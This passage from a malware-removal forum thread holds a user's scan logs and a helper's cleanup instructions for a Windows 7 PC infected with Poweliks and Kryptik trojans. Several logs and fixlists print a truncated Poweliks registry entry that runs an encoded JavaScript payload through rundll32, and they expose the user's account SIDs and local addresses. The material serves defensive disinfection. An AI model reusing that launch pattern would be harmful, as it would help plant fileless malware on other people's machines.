CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
==================== Restore Points =========================
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 11:24 - 2011-04-25 11:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 18:43 - 2012-03-19 18:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 09:58 - 2012-03-09 09:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 09:58 - 2012-03-09 09:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 12:20 - 2012-04-17 12:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 14:15 - 2012-03-28 14:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 18:03 - 2012-03-28 10:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 19:30 - 2012-05-03 17:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 19:30 - 2012-05-03 12:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 19:30 - 2012-04-20 19:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 19:30 - 2012-03-15 13:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 18:03 - 2012-03-28 10:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (10/30/2014 03:02:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Faulting module name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Exception code: 0xc0000005
Fault offset: 0x000000000007d778
Faulting process id: 0xe9c
Faulting application start time: 0xBtvStack.exe0
Faulting application path: BtvStack.exe1
Faulting module path: BtvStack.exe2
Report Id: BtvStack.exe3
Error: (10/30/2014 00:56:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/29/2014 08:55:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 08:39:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 07:54:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Faulting module name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Exception code: 0xc0000005
Fault offset: 0x000000000007d778
Faulting process id: 0xb18
Faulting application start time: 0xBtvStack.exe0
Faulting application path: BtvStack.exe1
Faulting module path: BtvStack.exe2
Report Id: BtvStack.exe3
System errors:
=============
Error: (10/30/2014 03:02:42 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Error: (10/30/2014 03:01:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (10/30/2014 03:00:36 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:58:36 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:57:35 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:56:34 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:55:33 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:53:33 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:52:32 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:51:31 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Microsoft Office Sessions:
=========================
Error: (10/30/2014 03:02:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: BtvStack.exe7.4.0.1224f387d95BtvStack.exe7.4.0.1224f387d95c0000005000000000007d778e9c01cff3fe534dd6daC:\Program Files (x86)\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Bluetooth Suite\BtvStack.exe9a33b6ca-5ff1-11e4-a198-006b9e00c96d
Error: (10/30/2014 00:56:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/29/2014 08:55:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 08:39:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 07:54:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: BtvStack.exe7.4.0.1224f387d95BtvStack.exe7.4.0.1224f387d95c0000005000000000007d778b1801cff3d398da8f89C:\Program Files (x86)\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Bluetooth Suite\BtvStack.exedb301af5-5fc6-11e4-844e-006b9e00c96d
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 31%
Total physical RAM: 8085.95 MB
Available physical RAM: 5516.39 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 13398.46 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:822.09 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
The aswMBR scan ran all night but finally finished. Here is the log:
aswMBR version 1.0.1.2161 Copyright(c) 2014 AVAST Software
Run date: 2014-10-30 03:27:53
-----------------------------
03:27:53.920 OS Version: Windows x64 6.1.7601 Service Pack 1
03:27:53.920 Number of processors: 8 586 0x3A09
03:27:53.920 ComputerName: RYAN-PC UserName: Ryan
03:27:55.449 Initialize success
03:27:55.480 VM: initialized successfully
03:27:55.496 VM: Intel CPU BiosDisabled
03:27:58.108 VM: supported disk I/O iaStor.sys
03:28:26.266 AVAST engine defs: 14102902
03:28:35.876 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0
03:28:35.876 Disk 0 Vendor: ST1000LM 2AR1 Size: 953869MB BusType: 8
03:28:36.375 Disk 0 MBR read successfully
03:28:36.375 Disk 0 MBR scan
03:28:36.406 Disk 0 Windows 7 default MBR code
03:28:36.437 Disk 0 Partition 1 80 (A) 27 Hidden NTFS WinRE NTFS 600 MB offset 2048
03:28:36.437 Disk 0 default boot code
03:28:36.468 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 941267 MB offset 1230848
03:28:36.546 Disk 0 Partition 3 00 27 Hidden NTFS WinRE NTFS 12000 MB offset 1928945664
03:28:36.908 Disk 0 scanning C:\Windows\system32\drivers
03:29:01.702 Service scanning
03:29:36.064 Modules scanning
03:29:36.064 Disk 0 trace - called modules:
03:29:36.094 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys iaStor.sys hal.dll
03:29:36.094 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007aa5790]
03:29:36.094 3 CLASSPNP.SYS[fffff88000fcc43f] -> nt!IofCallDriver -> [0xfffffa8007534a40]
03:29:36.104 5 ACPI.sys[fffff88000edf7a1] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-0[0xfffffa8007533050]
03:29:38.609 AVAST engine scan C:\Windows
03:29:47.929 AVAST engine scan C:\Windows\system32
03:34:15.274 AVAST engine scan C:\Windows\system32\drivers
03:34:47.109 AVAST engine scan C:\Users\Ryan
12:16:25.655 File: C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll **INFECTED** Win32:Malware-gen
12:35:28.201 AVAST engine scan C:\ProgramData
12:44:42.706 Disk 0 statistics 4836813/0/22 @ 0.50 MB/s
12:44:42.722 Scan finished successfully
14:02:02.140 Disk 0 MBR has been saved successfully to "C:\Users\Ryan\Desktop\MBR.dat"
14:02:02.170 The log file has been saved successfully to "C:\Users\Ryan\Desktop\aswMBR.txt"
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. Save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CloseProcesses:
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\Users\Ryan\AppData\Local\Temp\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe
C:\Users\Ryan\AppData\Local\Temp\InstHelper.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\pslist.exe
C:\Users\Ryan\AppData\Local\Temp\vlc-2.1.3-win32.exe
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll
EmptyTemp:
Hosts:
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-AdwCleaner-by Xplode
Click on this link to download : ADWCleaner (http://www.bleepingcomputer.com/download/adwcleaner/)
Click on ONE of the Two Blue Download Now buttons That have a blue arrow beside them and save it to your desktop.
Do not click on any links in the top Advertisement.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Scan.
After the scan is complete click on "Clean"
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S1].txt as well.
NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why (http://www.im-infected.com/hijacker/isearch-avg-comsearch-hijacker.html) and Here (http://nojesusnopeas.blogspot.com/2012/08/sorry-but-avg-secure-search-is-malware.html). You can always Reinstall (http://www.avg.com/us-en/secure-search) it.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Please download Junkware Removal Tool (http://www.bleepingcomputer.com/download/junkware-removal-tool/) to your desktop.
Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.
Please post
Fixlog.txt
C:\AdwCleaner.txt
JRT.txt
ascot1340
2014-10-31, 04:01
What light through yonder window breaks? It is the east, and Juliet is the sun!
The FRST, ADWCleaner, and JRT logs are posted below. Thanks so much for your help!
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 30-10-2014
Ran by Ryan at 2014-10-30 21:17:54 Run:1
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\Users\Ryan\AppData\Local\Temp\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe
C:\Users\Ryan\AppData\Local\Temp\InstHelper.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\pslist.exe
C:\Users\Ryan\AppData\Local\Temp\vlc-2.1.3-win32.exe
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll
EmptyTemp:
Hosts:
End
*****************
Processes closed successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
C:\Users\Ryan\AppData\Local\Temp\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\InstHelper.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\pslist.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\vlc-2.1.3-win32.exe => Moved successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
C:\Windows => ":nlsPreferences" ADS removed successfully.
C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll => Moved successfully.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.
EmptyTemp: => Removed 11.6 GB temporary data.
The system needed a reboot.
==== End of Fixlog ====
# AdwCleaner v3.311 - Report created 30/10/2014 at 21:48:34
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Ryan - RYAN-PC
# Running from : C:\Users\Ryan\Desktop\AdwCleaner.exe
# Option : Clean
***** [ Services ] *****
***** [ Files / Folders ] *****
Folder Deleted : C:\Users\Ryan\AppData\Roaming\Solvusoft
***** [ Scheduled Tasks ] *****
***** [ Shortcuts ] *****
***** [ Registry ] *****
***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17344
*************************
AdwCleaner[R0].txt - [726 octets] - [30/10/2014 21:46:47]
AdwCleaner[S0].txt - [650 octets] - [30/10/2014 21:48:34]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [709 octets] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.21.2014:1)
OS: Windows 7 Home Premium x64
Ran by Ryan on Thu 10/30/2014 at 21:53:26.13
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~ Services
~~~ Registry Values
~~~ Registry Keys
~~~ Files
~~~ Folders
~~~ Event Viewer Logs were cleared
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 10/30/2014 at 21:55:17.45
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What light through yonder window breaks? It is the east, and Juliet is the sun!
LOL
That should have helped the machine?
Download Malwarebytes' Anti-Malware (http://www.malwarebytes.org/mbam-download.php) to your desktop.
Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
On the Dashboard click on Update Now
Go to the Settings Tab
Under Settings go to Detection and Protection
Under PUP and PUM make sure both are set to show Treat Detections as Malware
Go to Advanced Settings and make sure Automatically Quarantine Detected Items is checked
Then on the Dashboard click on Scan
Make sure to select THREAT SCAN
Then click on Scan
When the scan is finished and the log pops up...select Copy to Clipboard
Please paste the log back into this thread for review
Exit Malwarebytes
ascot1340
2014-10-31, 22:17
Malwarebytes Anti-Malware
www.malwarebytes.org
Scan Date: 10/31/2014
Scan Time: 4:00:11 PM
Logfile:
Administrator: Yes
Version: 2.00.3.1025
Malware Database: v2014.10.31.10
Rootkit Database: v2014.10.22.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Ryan
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 392031
Time Elapsed: 12 min, 51 sec
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
Processes: 0
(No malicious items detected)
Modules: 0
(No malicious items detected)
Registry Keys: 0
(No malicious items detected)
Registry Values: 0
(No malicious items detected)
Registry Data: 0
(No malicious items detected)
Folders: 0
(No malicious items detected)
Files: 0
(No malicious items detected)
Physical Sectors: 0
(No malicious items detected)
(end)
Update me please how the computer is at the moment.
What we can do now is run an online scan with Eset, for the time being it is our most trusted scanner.
Most reliable and thorough.
The settings I suggest will show us items located in quarantine folders so don't be alarmed with this, also, in case of a false positive I ask that you not allow it to delete what it does find.
This scanner can take quite a bit of time to run, depending of course how full your computer is.
Go here (http://www.eset.com/us/online-scanner/) to run an online scanner from ESET. Windows Vista/Windows 7/Windows 8 users will need to right click on their Internet Explorer shortcut, and select Run as Administrator
Note:
For browsers other than Internet Explorer, you will be prompted to download and install esetsmartinstaller_enu.exe. Click on the link and save the file to a convenient location. Double click on it to install and a new window will open. Follow the prompts.
Turn off the real time scanner of any existing antivirus program while performing the online scan. Here's how (http://www.techsupportforum.com/forums/f50/how-to-disable-your-security-applications-490111.html).
Click the blue Run ESET Online Scanner button
Tick the box next to YES, I accept the Terms of Use.
Click Start
When asked, allow the program to install the "OnlineScanner.cab" activex control by clicking the Install button
Once the activex control is installed, on the next screen click on Enable detection of potentially unwanted applications
Click on Advanced Settings
Make sure that the option Remove found threats is unticked.
Ensure these options are ticked
Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology
Click Start
Wait for the scan to finish
When the scan is done, if it shows a screen that says "Threats found!", then click "List of found threats", and then click "Export to text file..."
Save that text file on your desktop. Copy and paste the contents of that log as a reply to this topic.
Close the ESET online scan.
*************************************
ascot1340
2014-11-01, 05:54
The computer seems to be running normally now and there are no longer multiple dllhost.exe *32 processes running in the task manager. I ran the ESET Online scanner and the threat list is posted below:
C:\FRST\Quarantine\C\Users\Ryan\AppData\LocalLow\ynsvabi.dll.xBAD a variant of Win32/Kryptik.COFU trojan
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll a variant of Win32/Kryptik.COYH trojan
The computer seems to be running normally now and there are no longer multiple dllhost.exe *32 processes running in the task manager
Yes!
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. Save it to the Desktop as fixlist.txt
